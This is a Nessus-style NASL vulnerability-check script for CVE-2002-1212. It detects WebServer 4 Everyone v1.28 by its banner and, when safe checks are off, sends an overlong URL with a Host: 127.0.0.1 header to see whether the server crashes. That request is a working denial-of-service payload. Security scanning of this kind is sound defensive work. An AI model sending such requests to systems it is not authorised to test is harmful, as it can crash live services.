#
# This script was written by Michel Arboi <arboi@alussinan.org>
#
# GNU Public Licence
#
# Some vulnerable servers:
# WebServer 4 Everyone v1.28
#
#
########################
# References:
########################
# From:"Tamer Sahin" <ts@securityoffice.net>
# To:bugtraq@securityfocus.com
# Subject: [SecurityOffice] Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability
#
########################

if(description)
{
 script_id(11167);
 script_bugtraq_id(5967);
 script_cve_id("CVE-2002-1212");
 script_version ("$Revision: 8292 $");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"risk_factor", value:"Medium");
 
 name = "Webserver4everyone too long URL";
 script_name(name);
 
 desc = "
It may be possible to make Webserver4everyone execute
arbitrary code by sending it a too long url with 
the Host: field set to 127.0.0.1

Risk factor : High

Solution : Upgrade your web server.";



 script_description(desc);
 
 summary = "Webserver4everyone too long URL with Host field set";
 script_summary(summary);
 
 script_category(ACT_MIXED_ATTACK); # mixed
 
 
 script_copyright("This script is Copyright (C) 2002 Michel Arboi");
 family = "Gain a shell remotely";
 script_family(family);
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www",80);
 script_exclude_keys("www/too_long_url_crash");
 script_require_keys("www/webserver4everyone");
 exit(0);
}

#

include("http_func.inc");

port = get_http_port(default:80);

if (! get_port_state(port)) exit(0);

if(safe_checks())
{ 
  b = get_http_banner(port: port);
  if (egrep(string: b, pattern: "WebServer 4 Everyone/1\.([01][0-9]?|2[0-8])"))
    security_hole(port);
  exit(0);
}

if(http_is_dead(port:port))exit(0);

soc = http_open_socket(port);
if (! soc) exit(0);

req = string("GET /", crap(2000), " HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n");
send(socket:soc, data:req);
http_close_socket(soc);

if(http_is_dead(port: port))
{
  security_hole(port);
  set_kb_item(name:"www/too_long_url_crash", value:TRUE);
}
